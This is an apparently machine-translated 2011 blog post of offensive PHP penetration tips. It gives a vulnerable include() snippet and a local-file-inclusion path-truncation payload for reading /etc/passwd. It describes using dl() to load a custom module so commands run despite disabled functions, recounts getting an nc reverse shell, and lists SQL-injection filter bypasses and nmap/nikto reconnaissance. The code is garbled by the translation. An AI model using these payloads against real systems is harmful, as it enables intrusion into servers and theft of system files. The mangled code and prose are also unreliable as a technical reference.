PHP security tips

Author: LengF Time: 2011-06-24

I have done some tests recently, and I have summarized some of my skills to facilitate my learning. If you think it is useful, let's go!

Tip 1: use the File Inclusion vulnerability in PHP
If

<? Php
Include ($ _ GET [p]. ". php ");
?>

If allow_url_include = On, I will not talk about it. If it is OFF, it will be LFI. Some people say that in addition to using the source code system itself to include executable files (the last method mentioned in the article "PHP security LFI vulnerability GetShell Parade ). But if the system is not open-source, you do not know how to use it? Or is there no such method of exploitation in this system? What I want to talk about is this method of File Reading. If the above Code is saved as lfi. php, we can read it in this way. We take the/etc/passwd file in Linux as an example. We can use the following code:

Lfi. php? P = invalid .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /.

This method is followed. /. /The subsequent number depends on the maximum length of the path supported by your target system. You can use it for self-verification. This allows you to read all the file formats you want. Not necessarily php. Of course, some people will say that you can cut off % 00, no, sometimes, but I also mentioned in another article that the truncation bug in php> = 5.3.4 has been fixed. I thought of this idea only when I was unable to intercept it. Of course, LFI has other applications. For details, please refer to the GETSHELL parade on the LFI vulnerability of PHP security. Other methods can also be used. For example, if there are countless // numbers that are later than the maximum length of the file path, they will be discarded.
Tip 2: Alternative Command Execution Methods
The tips here are about how to execute command methods when php disables various functions. However, sometimes it is better. A friend threw me a shell in the air. I looked at it and couldn't do anything except to modify my web files. I was a bit silly. However, my friend Tm3yShell7 told me that there is another way to implement php to execute commands and send me a php function dl (). Haha, I'm happy (I don't know how to pretend to be a bucket) hurry up to find information about baidu.
The premise of using this is php. enable_d = on in ini (enabled by default in PHP5.2.5), then we can use our custom. so (linux) or. dll (in windows) to execute the command. Many default shells use some php system functions to execute commands, such as the most common system, exec, passthru, shell_exec, proc_open. As to whether the service is disabled, we can check the following php code:

<? Php
Function showdisablefunctions (){
If ($ disablefunc = @ ini_get ("disable_functions") {return $ disablefunc ;}
Else {return "NULL ";}
}
Echo "Disabled Functions:". showdisablefunctions ();
?>

This function will output all disabled systems. If the input is NULL, there will be more ideas. Why check the disabled php functions first? Because it is related to our application skills when writing so or dll files. So sometimes it is often necessary to compile and load the so or dll modules that do not understand according to different environments. So how to execute and load this module? Let's take a look at the code that is being Dynamically Loaded (first upload your so module to the same directory of this file)

Dl (php5.so); // name of the compiled Module

As for how to compile the so file, I am looking for some reference materials in the reference documentation, of course, php is the best official.
Using this method, I realized that the nc rebounded back (the shell cannot be executed before it was used, but the most important thing is to rely on the support of perl, using nc. pl version) as for the subsequent overflow detection permission is very BT, but you have to look back.
Tip 3: Anti-injection Bypass
Anti-injection bypass has always been a topic of interest. The most common ideas are:
1. case-insensitive mixed write
2. Encoding statement, using php Functions
3./**/or /*! */
This is not a summary. Based on your experience, you will understand the experiment. Take a look at the official php documents and do not ignore old bugs.
Tip 4: information collection by inverted door
Originally, this technique does not belong to php and applies to any Penetration Process, so it is a plug-in. In Linux, security detection tools are more afraid than Window tools, but you are afraid. You have lost a lot of good tools. I often use several gadgets on the Linux platform to collect powerful information:
1. nmap Scanning
This tool has many function parameters. I only mention one and it is also commonly used. nmap-O ip can obtain the system type, open port, and corresponding services, the collection mainly provides a broader idea for subsequent detection, so as not to cause penetration failure because a vulnerability is ignored.
2. nikto Detection
This tool can often find some directories that are hard to find manually. It can scan through multiple methods on the network, which is better than wwwscan, because wwwscan is based on dictionaries, this tool collects any document files on the website, which is similar to a spider. Of course, it is not a simple url traversal, but also displays the file content. At the same time, it is even more powerful when scanning for some known vulnerabilities. It provides the complete vulnerability file number so that no vulnerability is possible.